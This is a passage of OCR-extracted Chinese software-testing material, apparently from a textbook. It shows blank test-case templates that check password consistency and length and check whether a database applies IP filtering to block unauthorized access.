(D 检查 密码 是 否 一 致 。 Expected Results: 
@ 检查 密码 长 度 


场景 法 


Pass/Fail: Test Notes: 


Author: 


表 15-78 ”数据库 访问 限制 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case005: 数据 库 访问 限制 


Summary: 

Steps: Expected Results; 
查看 是 否 应 用 IP 过 滤 策 略 ,阻止 非法 访问 

场景 法 

Pass/Fail; Test Notes; 


Author: 
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